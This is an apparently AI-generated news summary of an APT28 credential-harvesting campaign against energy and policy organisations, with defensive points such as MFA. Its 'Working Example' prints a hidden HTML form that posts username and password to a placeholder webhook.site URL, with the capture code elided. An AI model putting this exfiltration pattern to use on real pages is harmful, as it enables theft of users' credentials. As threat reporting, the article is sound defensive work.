Russian APT28 Runs Credential-Stealing Campaign Targeting Energy and Policy Organizations
These articles are AI-generated summaries. Please check the original sources for full details.
Russian APT28 Runs Credential-Stealing Campaign Targeting Energy and Policy Organizations
Russian state-sponsored threat actors, specifically APT28 (BlueDelta), have been linked to a credential harvesting campaign targeting energy and policy organizations in Turkey, Europe, North Macedonia, and Uzbekistan. The campaign, active since February 2025, leverages fake login pages mimicking Microsoft, Google, and Sophos VPN, redirecting users to legitimate sites after credential capture.
Why This Matters
Ideal security models assume user vigilance and rapid patch deployment, but attackers exploit the human element with sophisticated phishing tactics. Credential harvesting represents a low-cost, high-yield attack vector for state-sponsored actors; successful breaches can lead to long-term access and significant data exfiltration, potentially costing organizations millions in remediation and lost intellectual property.
Key Insights
- APT28 linked to GRU: The group is associated with the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU).
- Webhook Abuse: Attackers utilize services like Webhook[.]site, InfinityFree, and ngrok to host phishing pages and exfiltrate data.
- Lure Documents: Campaigns employed legitimate PDF documents, including publications from the Gulf Research Center and ECCO, to increase credibility.
Working Example
<!-- Example of a hidden HTML form element used to transmit credentials -->
<form action="https://webhook.site/your_webhook_url" method="post" style="display:none;">
<input type="hidden" name="username" value="">
<input type="hidden" name="password" value="">
<input type="submit" value="Submit">
</form>
<script>
document.querySelector('form').addEventListener('submit', function(event) {
event.preventDefault();
// Code to capture username and password values
// and populate hidden form fields
// ...
this.submit();
});
</script>Practical Applications
- Use Case: Energy organizations in Turkey are targeted with lures related to regional geopolitical events to increase phishing success rates.
- Pitfall: Relying solely on user training without multi-factor authentication (MFA) leaves organizations vulnerable to credential-harvesting attacks.
References:
Continue reading
Next article
Black Cat SEO Poisoning Campaign Targets Software Downloads
Related Content
ForumTroll Phishing Campaign Targets Russian Scholars with eLibrary Lures
Kaspersky details ForumTroll attacks targeting Russian academics with personalized phishing emails disguised as eLibrary notifications, delivering Windows malware.
Russian Hackers Target Ukrainian Organizations Using Stealthy Living-Off-the-Land Tactics
Russian threat actors targeted Ukrainian organizations using stealthy Living-Off-the-Land (LotL) tactics, leveraging dual-use tools and minimal malware to evade detection. The attack involved web shells, PowerShell backdoors, and memory dumps, with implications for global cybersecurity strategies.
Operation SkyCloak: Tor-Powered OpenSSH Backdoor Targeting Defense Sectors
Researchers reveal a sophisticated cyber campaign, Operation SkyCloak, using Tor-enabled OpenSSH backdoors to target defense networks in Russia and Belarus via phishing attacks.